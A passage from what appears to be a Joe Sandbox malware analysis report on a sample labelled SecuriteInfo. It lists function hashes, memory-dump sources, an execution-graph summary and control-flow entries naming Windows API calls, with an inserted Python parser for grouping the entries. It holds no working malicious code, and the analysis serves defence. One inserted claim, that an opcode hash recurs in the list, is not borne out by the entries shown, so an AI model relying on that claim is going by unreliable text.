• Instruction ID: 009d6b10877a8af8fa0de14b88d5094cc295f406c48f220932df92755985da99
• Opcode Fuzzy Hash: c02608ae7fdd6dbde4dc06ae057c33988074160e7ca121dc10ae75c1f0855aa5
• Instruction Fuzzy Hash: 1C11BB79504280CFCB11CF10D5C4B15BBA1FB84324F28C6AAD80A4B656C33AD84BCBA2
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.343410847.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a4d000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c02608ae7fdd6dbde4dc06ae057c33988074160e7ca121dc10ae75c1f0855aa5
• Instruction ID: 06b29a05d0e33aae737f0e7e8f5ed22ab8868dc7ef1460d94ca89400c076c782
• Opcode Fuzzy Hash: c02608ae7fdd6dbde4dc06ae057c33988074160e7ca121dc10ae75c1f0855aa5
• Instruction Fuzzy Hash: 63118879904284DFCB12CF10D5C4B55BBB1FB84324F28C6AAD8494B696C37AD85ACB62
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.343329566.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a3d000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 46f9612ec006fe30e343eca319709448874dc554698717dcb4acd0e18578246d
• Instruction ID: 80457287c019cf809babeaacfb0e3f67904e376faf186a4aad9a5762f779463a
• Opcode Fuzzy Hash: 46f9612ec006fe30e343eca319709448874dc554698717dcb4acd0e18578246d
• Instruction Fuzzy Hash: 07012B714083C4DAE7108F21DC84B6AFBA8EF41378F18C55AFD045F24AD3799844DAB1
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.343329566.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a3d000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: faf94d984be0f20cb5cbc126279d31fbb28e6e4b84236a8364345bafc2ddeb1c
• Instruction ID: 6d53aacfeb64e7593e3fa7e86e4659e2f557afe35dbd4a974117aeb22b6ace46
• Opcode Fuzzy Hash: faf94d984be0f20cb5cbc126279d31fbb28e6e4b84236a8364345bafc2ddeb1c
• Instruction Fuzzy Hash: C8F06271404284AEEB508F15DC88B66FF98EB41774F18C45AED085F286C379AC44CAB1
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.343735632.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ae0000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 36182436cebeb55a52715cb650506d86002e0dbd806e213bbc15d2a3cce4ea62
• Instruction ID: f0d7a16b46fd9e45e0e9ff2d180b6a824ee227d9f799de79a265752e9d4b8eba
• Opcode Fuzzy Hash: 36182436cebeb55a52715cb650506d86002e0dbd806e213bbc15d2a3cce4ea62
• Instruction Fuzzy Hash: DA613778D046448FDB49DFAAE941A8EBBF2BBCD304F04C539D104AB278EB71590A9F51
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.343735632.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ae0000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 872ba1ac04d1f758b9895e810ca135c9b770f575bb643e8f0f0dc25e0a5f4ea1
• Instruction ID: fd265d9b7d7d24fa5057ea9d1e8b03f0d7a96397fd38b6406e8ae8a96687f235
• Opcode Fuzzy Hash: 872ba1ac04d1f758b9895e810ca135c9b770f575bb643e8f0f0dc25e0a5f4ea1
• Instruction Fuzzy Hash: 35517CB2E056548BEB1CCF6B984068EBBF3AFC9214F19C1BAC80C6B619DB3115569F41
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.343735632.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ae0000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 869f58f4f22fb48e1151ed65f7485108ba3ee99dc2843e71f201f3e058658950
• Instruction ID: 2b358ca9e1033039a4c742caa7b311e08dd4808195ec25e5da8e27d4f2868705
• Opcode Fuzzy Hash: 869f58f4f22fb48e1151ed65f7485108ba3ee99dc2843e71f201f3e058658950
• Instruction Fuzzy Hash: BE412471E056588BEB1CCF6B8D4028EFAF3AFC9310F14C1BA990CAA264EB3105568F51
Uniqueness
Uniqueness Score: -1.00%
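The function entries above share one fixed layout, and two Opcode IDs (ae8faed1… and c02608ae…) each occur twice with different Instruction IDs. The parser below is an added example, not Joe Sandbox code and not part of the report: it reads that layout, groups entries by Opcode ID, and counts entries per dumped region. Its input is a constructed excerpt of three entries whose values are copied from the list above; the field names and the Offset extraction follow the report text exactly, and the reading of Opcode ID as an opcode-only hash is an inference from the report (every entry's Opcode Fuzzy Hash equals its Opcode ID).

```python
import re
from collections import defaultdict

# Constructed sample input in the report's own block format. The values are
# copied from three of the function entries above; nothing here is fetched.
REPORT_EXCERPT = """\
Memory Dump Source
• Source File: 00000000.00000002.343329566.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a3d000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ae8faed18134251be7da795e85ade6b132c84643db4099356389b19b4f3572d3
• Instruction ID: 5adf3ae5ec5e7fccdc59b6b56cec59a708192857fd710d7a478833ef32807387
• Opcode Fuzzy Hash: ae8faed18134251be7da795e85ade6b132c84643db4099356389b19b4f3572d3
• Instruction Fuzzy Hash: EE11E676504284DFCF01CF10D5C4B16BF72FB94320F24C6A9E8484B656C33AE85ACBA1
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000000.00000002.343329566.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a3d000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ae8faed18134251be7da795e85ade6b132c84643db4099356389b19b4f3572d3
• Instruction ID: 732866228e7fe73526df1bf996ec7fd4df146ff44cb80fd623da3f6ba29b5566
• Opcode Fuzzy Hash: ae8faed18134251be7da795e85ade6b132c84643db4099356389b19b4f3572d3
• Instruction Fuzzy Hash: 4D110876504280CFCF12CF10D5C4B16BF71FB94324F24C6A9E8054B656C33AD85ACBA1
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000000.00000002.343410847.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a4d000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c02608ae7fdd6dbde4dc06ae057c33988074160e7ca121dc10ae75c1f0855aa5
• Instruction ID: 009d6b10877a8af8fa0de14b88d5094cc295f406c48f220932df92755985da99
• Opcode Fuzzy Hash: c02608ae7fdd6dbde4dc06ae057c33988074160e7ca121dc10ae75c1f0855aa5
• Instruction Fuzzy Hash: 1C11BB79504280CFCB11CF10D5C4B15BBA1FB84324F28C6AAD80A4B656C33AD84BCBA2
Uniqueness
Uniqueness Score: -1.00%
"""

FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")
SCORE_RE = re.compile(r"Uniqueness Score:\s*(-?[0-9.]+)%")


def parse_entries(text):
    """One dict per 'Memory Dump Source' block; each bullet field becomes a key."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = {}
            entries.append(current)
        elif current is None or not line:
            continue
        elif (m := FIELD_RE.match(line)):
            key, value = m.group(1).strip(), m.group(2).strip()
            current[key] = value
            if key == "Source File":
                om = OFFSET_RE.search(value)
                current["Offset"] = om.group(1).upper() if om else None
        elif (sm := SCORE_RE.search(line)):
            current["Uniqueness Score"] = float(sm.group(1))
    return entries


def shared_opcode_ids(entries):
    """Opcode IDs found in more than one entry -> [(offset, instruction id), ...].

    Inference from the report: every entry's Opcode Fuzzy Hash equals its Opcode
    ID, so the Opcode ID hashes the opcode sequence alone. One Opcode ID with two
    Instruction IDs therefore means the same opcode stream with different
    operands, e.g. two copies of one routine in the unpacked code."""
    groups = defaultdict(list)
    for e in entries:
        if e.get("Opcode ID"):
            groups[e["Opcode ID"]].append((e.get("Offset"), e.get("Instruction ID")))
    return {oid: refs for oid, refs in groups.items() if len(refs) > 1}


def entries_per_region(entries):
    """How many function entries each dumped region (keyed by Offset) contributes."""
    counts = defaultdict(int)
    for e in entries:
        counts[e.get("Offset")] += 1
    return dict(counts)
```

Run against the full report text, `shared_opcode_ids` is the quick way to spot duplicated unpacked code across the A3D000, A4D000 and AE0000 dumps before opening any of them in a disassembler.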

Execution Graph

Execution Coverage: 21%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 377
Total number of Limit Nodes: 13

execution_graph (serialized node and edge data behind the report's interactive graph view, written as node id, address, optional label, and id->id edges; cut off mid-list in this copy). Recoverable content:
• Entry nodes: 60af988, 60a6300
• Node addresses lie in the range 60a6300–60afa56
• API calls named on graph nodes: KiUserCallbackDispatcher (60afa29, 60af9e8); KiUserExceptionDispatcher (the functions at 60a7172–60a77f9 called from 60a6437, most of which continue through 60a769e and 60a76e3 before returning via 60a783c); CallWindowProcW (60af61b, 60af628, 60af6c2)
• Nodes labelled only "2 API calls" or "3 API calls": 60a9300, 60a9310, 60aac98, 60aee69, 60aee78, 60af041, 60af0e8, 60aaec0, 60aaed0, 60ab038, 60ab7e0, 60ab7f0, 60adbb4, 60ae488, 60ae655, 60ac530, 60ac540, and the 60a7172–60a77f9 functions reached from 60a6437
27844 60ac530 2 API calls 27834->27844 27845 60ac540 2 API calls 27834->27845 27835->27836 27835->27839 27840 60ab7e0 2 API calls 27835->27840 27841 60ab7f0 2 API calls 27835->27841 27836->27839 27846 60ab7e0 2 API calls 27836->27846 27847 60ab7f0 2 API calls 27836->27847 27837 60abe46 27838 60abe97 27837->27838 27842 60ac530 2 API calls 27837->27842 27843 60ac540 2 API calls 27837->27843 27838->27773 27839->27773 27840->27834 27841->27834 27842->27837 27843->27837 27844->27836 27845->27836 27846->27837 27847->27837 27849 60adbc9 27848->27849 27851 60adff0 27849->27851 27852 60aee78 2 API calls 27849->27852 27853 60aee69 2 API calls 27849->27853 27850 60ae672 27850->27774 27851->27774 27852->27850 27853->27850 27855 60ae4a1 27854->27855 27857 60ae497 27854->27857 27855->27857 27858 60aee78 2 API calls 27855->27858 27859 60aee69 2 API calls 27855->27859 27856 60ae672 27856->27774 27857->27774 27858->27856 27859->27856 27861 60ae660 27860->27861 27863 60aee78 2 API calls 27861->27863 27864 60aee69 2 API calls 27861->27864 27862 60ae672 27862->27774 27863->27862 27864->27862 27867 60ac535 27865->27867 27866 60ac8da 27866->27821 27867->27866 27875 60ad0b8 27867->27875 27880 60ad0c8 27867->27880 27871 60ac8da 27870->27871 27872 60ac56b 27870->27872 27871->27821 27872->27871 27873 60ad0b8 2 API calls 27872->27873 27874 60ad0c8 2 API calls 27872->27874 27873->27872 27874->27872 27876 60ad0c8 27875->27876 27877 60ad0da 27876->27877 27885 60ad2b8 27876->27885 27891 60ad400 27876->27891 27877->27867 27881 60ad0e4 27880->27881 27882 60ad0da 27880->27882 27881->27882 27883 60ad2b8 2 API calls 27881->27883 27884 60ad400 2 API calls 27881->27884 27882->27867 27883->27882 27884->27882 27887 60ad2ca 27885->27887 27886 60ad36d 27886->27877 27887->27886 27889 60ad4f8 CallWindowProcW CallWindowProcW 27887->27889 27890 60ad508 CallWindowProcW CallWindowProcW 27887->27890 27888 60ad426 27888->27877 27889->27888 27890->27888 27893 60ad4f8 CallWindowProcW CallWindowProcW 27891->27893 
27894 60ad508 CallWindowProcW CallWindowProcW 27891->27894 27892 60ad426 27892->27877 27893->27892 27894->27892 27896 60aae53 27895->27896 27898 60aaec0 2 API calls 27896->27898 27899 60aaed0 2 API calls 27896->27899 27897 60aaeb3 27897->27747 27898->27897 27899->27897 27901 60aae53 27900->27901 27903 60aaec0 2 API calls 27901->27903 27904 60aaed0 2 API calls 27901->27904 27902 60aaeb3 27902->27747 27903->27902 27904->27902 27905 2dbb4d0 27906 2dbb4ee 27905->27906 27909 2db9e1c 27906->27909 27908 2dbb525 27910 2dbcff0 LoadLibraryA 27909->27910 27912 2dbd0cc 27910->27912 27913 2db4560 27914 2db4574 27913->27914 27917 2db47aa 27914->27917 27915 2db457d 27918 2db47b3 27917->27918 27923 2db4881 27917->27923 27927 2db498c 27917->27927 27931 2db49a6 27917->27931 27935 2db4890 27917->27935 27918->27915 27924 2db4890 27923->27924 27925 2db49cb 27924->27925 27939 2db4c88 27924->27939 27928 2db493f 27927->27928 27929 2db49cb 27928->27929 27930 2db4c88 2 API calls 27928->27930 27930->27929 27932 2db49b9 27931->27932 27933 2db49cb 27931->27933 27934 2db4c88 2 API calls 27932->27934 27934->27933 27936 2db48d4 27935->27936 27937 2db49cb 27936->27937 27938 2db4c88 2 API calls 27936->27938 27938->27937 27940 2db4ca6 27939->27940 27944 2db4cd8 27940->27944 27948 2db4ce8 27940->27948 27941 2db4cb6 27941->27925 27945 2db4ce8 27944->27945 27946 2db4d4c RtlEncodePointer 27945->27946 27947 2db4d75 27945->27947 27946->27947 27947->27941 27949 2db4d22 27948->27949 27950 2db4d4c RtlEncodePointer 27949->27950 27951 2db4d75 27949->27951 27950->27951 27951->27941

Control-flow Graph
control_flow_graph 0 60a7172-60a7e2a KiUserExceptionDispatcher * 3 140 60a7e30-60a7e7f 0->140
APIs
• KiUserExceptionDispatcher.NTDLL ref: 060A767F
• KiUserExceptionDispatcher.NTDLL ref: 060A76C4
• KiUserExceptionDispatcher.NTDLL ref: 060A7820
Memory Dump Source
• Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
• Opcode ID: 8f1bb46e98f20c5913c11125afa0eb1e79822f7cf8016927c75e8563f292db30
• Instruction ID: 8c41a79e50d4d91a62f78c4cc18b40b836c571f20b915bb6d607fe10832f92bb
• Opcode Fuzzy Hash: 8f1bb46e98f20c5913c11125afa0eb1e79822f7cf8016927c75e8563f292db30
• Instruction Fuzzy Hash: 5E026738A45358CFCB65DF60D88869DBBB2BF49346F5081E9E50A62740CB398EC5CF61
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 143 60a7193-60a7e2a KiUserExceptionDispatcher * 3 283 60a7e30-60a7e7f 143->283
APIs
• KiUserExceptionDispatcher.NTDLL ref: 060A767F
• KiUserExceptionDispatcher.NTDLL ref: 060A76C4
• KiUserExceptionDispatcher.NTDLL ref: 060A7820
Memory Dump Source
• Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
• Opcode ID: 9ccc5cc482f50d58753e271f634b41e66120f667c791e21aaf5f822cc66b0f00
• Instruction ID: 36a44af7125173835db4fe31bc0c059c12b3a57ab1f3e0d060f703c0deba1b7d
• Opcode Fuzzy Hash: 9ccc5cc482f50d58753e271f634b41e66120f667c791e21aaf5f822cc66b0f00
• Instruction Fuzzy Hash: 8B025738A45358CFCB65DF60D88869DBBB2BF49346F5081E9E50A62740CB398EC5CF61
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 286 60a71d8-60a7e2a KiUserExceptionDispatcher * 3 423 60a7e30-60a7e7f 286->423
APIs
• KiUserExceptionDispatcher.NTDLL ref: 060A767F
• KiUserExceptionDispatcher.NTDLL ref: 060A76C4
• KiUserExceptionDispatcher.NTDLL ref: 060A7820
Memory Dump Source
• Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
• Opcode ID: db58713585e3a69251ff596069734d6abdd75fa92419783d6d62eb1e311c3b12
• Instruction ID: 927f54091d44d79c93ea11ed824ff887de0dcc739c015ad83d1f5c65c9fc8158
• Opcode Fuzzy Hash: db58713585e3a69251ff596069734d6abdd75fa92419783d6d62eb1e311c3b12
• Instruction Fuzzy Hash: F7025738A45358CFCB65DF60D88869DBBB2BF49346F5081E9E50A62740CB398EC5CF61
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 426 60a721d-60a7e2a KiUserExceptionDispatcher * 3 560 60a7e30-60a7e7f 426->560
APIs
• KiUserExceptionDispatcher.NTDLL ref: 060A767F
• KiUserExceptionDispatcher.NTDLL ref: 060A76C4
• KiUserExceptionDispatcher.NTDLL ref: 060A7820
Memory Dump Source
• Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
• Opcode ID: 476782c9cfbd54aaa332205e74e4cc3097195526ad48f57a502f453ee2046822
• Instruction ID: e6e82a29cde0cc00a83baa3ca4eb765c9b4eb381afc9eee1d499e3970c9a15e2
• Opcode Fuzzy Hash: 476782c9cfbd54aaa332205e74e4cc3097195526ad48f57a502f453ee2046822
• Instruction Fuzzy Hash: 90025738A45358CFCB65DF60D88869DBBB2BF49346F5081E9E50A62740CB398EC5CF61
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 563 60a7262-60a7e2a KiUserExceptionDispatcher * 3 694 60a7e30-60a7e7f 563->694
APIs
• KiUserExceptionDispatcher.NTDLL ref: 060A767F
• KiUserExceptionDispatcher.NTDLL ref: 060A76C4
• KiUserExceptionDispatcher.NTDLL ref: 060A7820
Memory Dump Source
• Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
• Opcode ID: 609867294c3730ad641bf2a3c7f087157123bf7e49da7c2f4d6606fdc6c1c02d
• Instruction ID: 121c0e4f09264e0c76a5a69dea7817cee0d9b1cf386a4bf1d2c34a8c4e19fde0
• Opcode Fuzzy Hash: 609867294c3730ad641bf2a3c7f087157123bf7e49da7c2f4d6606fdc6c1c02d
• Instruction Fuzzy Hash: C3025738A45358CFCB65DF60D88869DBBB2BF49346F5081E9D50A62740CB398EC5CF61
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 697 60a72a7-60a7e2a KiUserExceptionDispatcher * 3 825 60a7e30-60a7e7f 697->825
APIs
• KiUserExceptionDispatcher.NTDLL ref: 060A767F
• KiUserExceptionDispatcher.NTDLL ref: 060A76C4
• KiUserExceptionDispatcher.NTDLL ref: 060A7820
Memory Dump Source
• Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
• Opcode ID: 15a19fee69eab805aee36b3826ecb88f72ed457e72bdb0ee49d86b5ec2afb91b
• Instruction ID: d41bc6caf2d1e8413d330e84813ce2f1c6d696c652b5549c994ae4bf72c5919b
• Opcode Fuzzy Hash: 15a19fee69eab805aee36b3826ecb88f72ed457e72bdb0ee49d86b5ec2afb91b
• Instruction Fuzzy Hash: 30F15738A45358CFCB65DF60D88869DBBB2BF49346F5081E9D50A62740CB398EC5CF61
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 828 60a72ec-60a7e2a KiUserExceptionDispatcher * 3 953 60a7e30-60a7e7f 828->953
APIs
• KiUserExceptionDispatcher.NTDLL ref: 060A767F
• KiUserExceptionDispatcher.NTDLL ref: 060A76C4
• KiUserExceptionDispatcher.NTDLL ref: 060A7820
Memory Dump Source
• Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
• Opcode ID: 7eadf27321f03a7b7b73d4affb5c329a0c777f404ba0b74a24f683b0718246a5
• Instruction ID: fb89e1b0039d5dbabd27d663831d6a34a9efee0ad15b6c803cff0c605eafd7d3
• Opcode Fuzzy Hash: 7eadf27321f03a7b7b73d4affb5c329a0c777f404ba0b74a24f683b0718246a5
• Instruction Fuzzy Hash: 80F15638A45358CFCB65DF60D88869DBBB2BF49346F5081E9D50A62740CB398EC5CF61
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 956 60a7331-60a7e2a KiUserExceptionDispatcher * 3 1078 60a7e30-60a7e7f 956->1078
APIs
• KiUserExceptionDispatcher.NTDLL ref: 060A767F
• KiUserExceptionDispatcher.NTDLL ref: 060A76C4
• KiUserExceptionDispatcher.NTDLL ref: 060A7820
Memory Dump Source
• Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
• Opcode ID: 02a1d52bac51f3e359d1254ce3e812bdedfe1de3f7a6162956e439ff8329c33d
• Instruction ID: 535a161ee7faec9a6543781e4d8186a3b79b561c2cb8dc7c0405e69bd6f3ef7e
• Opcode Fuzzy Hash: 02a1d52bac51f3e359d1254ce3e812bdedfe1de3f7a6162956e439ff8329c33d
• Instruction Fuzzy Hash: 2AF15638A45358CFCB65DF60D88869DBBB2BF49346F5081E9D50A62740CB398EC5CF61
Uniqueness
• Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1081 60a7376-60a7e2a KiUserExceptionDispatcher * 3 1200 60a7e30-60a7e7f 1081->1200
APIs
• KiUserExceptionDispatcher.NTDLL ref: 060A767F
• KiUserExceptionDispatcher.NTDLL ref: 060A76C4
• KiUserExceptionDispatcher.NTDLL ref: 060A7820
Memory Dump Source
• Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph: basic block 60a73bb-60a7e2a (KiUserExceptionDispatcher × 3) -> basic block 60a7e30-60a7e7f

APIs
• KiUserExceptionDispatcher.NTDLL ref: 060A767F
• KiUserExceptionDispatcher.NTDLL ref: 060A76C4
• KiUserExceptionDispatcher.NTDLL ref: 060A7820
Memory Dump Source
• Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph: basic block 60a73f7-60a7e2a (KiUserExceptionDispatcher × 3) -> basic block 60a7e30-60a7e7f

APIs
• KiUserExceptionDispatcher.NTDLL ref: 060A767F
• KiUserExceptionDispatcher.NTDLL ref: 060A76C4
• KiUserExceptionDispatcher.NTDLL ref: 060A7820
Memory Dump Source
• Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph: basic block 60a743c-60a7e2a (KiUserExceptionDispatcher × 3) -> basic block 60a7e30-60a7e7f

APIs
• KiUserExceptionDispatcher.NTDLL ref: 060A767F
• KiUserExceptionDispatcher.NTDLL ref: 060A76C4
• KiUserExceptionDispatcher.NTDLL ref: 060A7820
Memory Dump Source
• Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph: basic block 60a7481-60a7e2a (KiUserExceptionDispatcher × 3) -> basic block 60a7e30-60a7e7f

APIs
• KiUserExceptionDispatcher.NTDLL ref: 060A767F
• KiUserExceptionDispatcher.NTDLL ref: 060A76C4
• KiUserExceptionDispatcher.NTDLL ref: 060A7820
Memory Dump Source
• Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph: basic block 60a74bd-60a7e2a (KiUserExceptionDispatcher × 3) -> basic block 60a7e30-60a7e7f

APIs
• KiUserExceptionDispatcher.NTDLL ref: 060A767F
• KiUserExceptionDispatcher.NTDLL ref: 060A76C4
• KiUserExceptionDispatcher.NTDLL ref: 060A7820
Memory Dump Source
• Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph: basic block 60a7502-60a7e2a (KiUserExceptionDispatcher × 3) -> basic block 60a7e30-60a7e7f

APIs
• KiUserExceptionDispatcher.NTDLL ref: 060A767F
• KiUserExceptionDispatcher.NTDLL ref: 060A76C4
• KiUserExceptionDispatcher.NTDLL ref: 060A7820
Memory Dump Source
• Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• KiUserExceptionDispatcher.NTDLL ref: 060A767F
• KiUserExceptionDispatcher.NTDLL ref: 060A76C4
• KiUserExceptionDispatcher.NTDLL ref: 060A7820
Memory Dump Source
• Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• KiUserExceptionDispatcher.NTDLL ref: 060A767F
• KiUserExceptionDispatcher.NTDLL ref: 060A76C4
• KiUserExceptionDispatcher.NTDLL ref: 060A7820
Memory Dump Source
• Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• KiUserExceptionDispatcher.NTDLL ref: 060A767F
• KiUserExceptionDispatcher.NTDLL ref: 060A76C4
• KiUserExceptionDispatcher.NTDLL ref: 060A7820
Memory Dump Source
